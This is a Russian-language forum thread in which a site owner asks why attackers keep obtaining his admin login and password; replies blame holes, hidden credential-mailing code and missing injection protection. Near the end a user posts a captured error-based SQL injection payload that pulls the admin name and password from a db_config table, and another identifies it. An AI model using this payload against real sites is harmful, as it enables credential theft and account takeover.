tonime30rus
Участник
- Сообщения
- 93
- Реакции
- 2
видимо у тебя стоит какой то модуль с дырой.ну или сам скрипт с дыройtonime30rus написал(а):Парни подскажите, в чем может быть проблемка как то накручивают себе серебро, узнают пароль и логин и тд. Но админку снес а в базе пароли поменял на все ровно как то удается это сделать в чем проблема?
tonime30rus
Участник
- Сообщения
- 93
- Реакции
- 2
модули все стандартные, а скрипт брал отсюда чистыйkvozimir написал(а):видимо у тебя стоит какой то модуль с дырой.ну или сам скрипт с дырой
я не помню чтобы кто то говорил что тут скрипт чистыйtonime30rus написал(а):модули все стандартные, а скрипт брал отсюда чистый
вискас где то тему создавал про логи посмотри ее и по изучай логи
Viktor
Участник
- Сообщения
- 734
- Реакции
- 113
tonime30rus
Участник
- Сообщения
- 93
- Реакции
- 2
Он пароль логин все узнать может, проверял базу не заходил туда вообщеkvozimir написал(а):видимо у тебя стоит какой то модуль с дырой.ну или сам скрипт с дырой
tonime30rus
Участник
- Сообщения
- 93
- Реакции
- 2
Не реклама прошу не банитьViktor написал(а):ссылку на сайт напиши сюда!
Скрытое содержимое для зарегистрированных пользователей!
Viktor
Участник
- Сообщения
- 734
- Реакции
- 113
tonime30rus
Участник
- Сообщения
- 93
- Реакции
- 2
сам делал, только брал движек с форума а что за код был именно???????Viktor написал(а):дизайн сам делал или заказывал? если кто-то вмешивался, то возможно код закрытый оставил, у меня такое было в одном скрипте, нашел код с другим мылом куда отсылался логин и пароль. Но точно уже не помню что за код. где-то в файлах входа искать надо или может вообще в другом месте быть
Viktor
Участник
- Сообщения
- 734
- Реакции
- 113
не помню уже что за код был, просто нашел лишний email прописан был в файле, когда удалил, то все хорошо стало, а так он просто с паера деньги списывал, хоть там и мало было, но все-равно не приятно.tonime30rus написал(а):сам делал, только брал движек с форума а что за код был именно???????
Viktor проверь все файлы на лушные коды и ссылки а то в стандартном есть такое и дыры тоже есть
tonime30rus
Участник
- Сообщения
- 93
- Реакции
- 2
Foma
Местный
- Сообщения
- 41
- Реакции
- 6
tonime30rus
Участник
- Сообщения
- 93
- Реакции
- 2
смысл доказать , я тут попросил помочь не а доказыватьFoma написал(а):Ooo,я знаю где дыра,могу доказать,пиши в лс
Foma
Местный
- Сообщения
- 41
- Реакции
- 6
IgrokNEW
Участник
- Сообщения
- 23
- Реакции
- 2
Вот именно,смысла доказывать нет! Просто смотри свои файлы,там элементарно нет защиты от инъекций даже,и чего ж ты хотел то?tonime30rus написал(а):смысл доказать , я тут попросил помочь не а доказывать
Shoma2114
Местный
- Сообщения
- 63
- Реакции
- 2
Подскажите Что эта за хрень такая (((
Код:
' and
(
select 1
from
(
select count(*),
concat
(
(
select (select concat(admin,' ',pass) from db_config where id = 1)
from information_schema.tables
limit 0,1
),
floor(rand(0)*2)
) x
from information_schema.tables
group by x) a
)
and '
' and
(
select 1
from
(
select count(*),
concat
(
(
select (select concat(admin,' ',pass) from db_config where id = 1)
from information_schema.tables
limit 0,1
),
floor(rand(0)*2)
) x
from information_schema.tables
group by x) a
)
and '
Последнее редактирование модератором:
Rubrika
Участник
- Сообщения
- 342
- Реакции
- 43
Shoma2114 написал(а):Подскажите Что эта за хрень такая (((
Код:' and ( select 1 from ( select count(*), concat ( ( select (select concat(admin,' ',pass) from db_config where id = 1) from information_schema.tables limit 0,1 ), floor(rand(0)*2) ) x from information_schema.tables group by x) a ) and ' ' and ( select 1 from ( select count(*), concat ( ( select (select concat(admin,' ',pass) from db_config where id = 1) from information_schema.tables limit 0,1 ), floor(rand(0)*2) ) x from information_schema.tables group by x) a ) and '
ну думаю и так понятно, что очень похоже на инъекцию для получения логина и пасса от админки.
Последнее редактирование модератором: